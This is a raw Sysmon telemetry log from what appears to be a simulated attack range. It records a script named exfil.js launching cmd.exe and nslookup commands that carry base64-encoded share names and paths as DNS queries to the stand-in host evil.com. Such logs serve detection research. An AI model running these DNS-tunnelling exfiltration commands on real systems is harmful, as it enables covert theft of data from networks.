154100x8000000000000000209849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.189{2E1864BB-18EE-629A-0244-000000005F02}5704C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmdl.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.181{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltpoip.tmpMD5=DF35AB54482476B9173CEB90AD028262,SHA256=D36A5C0891B34251E0B089204F7A21F9F91A19D06CA659E6438127A003B7EB57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.160{2E1864BB-18EE-629A-0044-000000005F02}56882620C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-0144-000000005F02}2872C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.160{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.160{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.160{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.160{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.160{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-0144-000000005F02}2872C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.160{2E1864BB-18EE-629A-FF43-000000005F02}64885040C:\Windows\system32\cmd.exe{2E1864BB-18EE-629A-0144-000000005F02}2872C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.163{2E1864BB-18EE-629A-0144-000000005F02}2872C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EE-629A-FF43-000000005F02}6488C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltpoip.tmp 2>&1 10341000x8000000000000000209839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.144{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-0044-000000005F02}5688C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.144{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-0044-000000005F02}5688C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.128{2E1864BB-18EE-629A-0044-000000005F02}56882620C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-FF43-000000005F02}6488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.128{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-0044-000000005F02}5688C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.113{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.113{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.113{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.113{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.113{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-FF43-000000005F02}6488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.113{2E1864BB-18E0-629A-6742-000000005F02}39767392C:\Windows\System32\WScript.exe{2E1864BB-18EE-629A-FF43-000000005F02}6488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.126{2E1864BB-18EE-629A-FF43-000000005F02}6488C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltpoip.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.113{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlodmc.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.081{2E1864BB-18EE-629A-FD43-000000005F02}73164672C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-FE43-000000005F02}7716C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.081{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.081{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.081{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.081{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.081{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-FE43-000000005F02}7716C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.081{2E1864BB-18EE-629A-FC43-000000005F02}18041276C:\Windows\system32\cmd.exe{2E1864BB-18EE-629A-FE43-000000005F02}7716C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.088{2E1864BB-18EE-629A-FE43-000000005F02}7716C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EE-629A-FC43-000000005F02}1804C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlodmc.tmp 2>&1 354300x8000000000000000209819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.407{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50744- 354300x8000000000000000209818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.407{00000000-0000-0000-0000-000000000000}5196<unknown process>-udptruefalse127.0.0.1-50744-false127.0.0.1-53domain 354300x8000000000000000209817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.407{00000000-0000-0000-0000-000000000000}5196<unknown process>-udpfalsefalse127.0.0.1-50743-false127.0.0.1-53domain 354300x8000000000000000209816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.864{00000000-0000-0000-0000-000000000000}4816<unknown process>-udpfalsefalse127.0.0.1-50729-false127.0.0.1-53domain 354300x8000000000000000209815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:31.864{00000000-0000-0000-0000-000000000000}4816<unknown process>-udptruefalse127.0.0.1-50729-false127.0.0.1-53domain 10341000x8000000000000000209814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 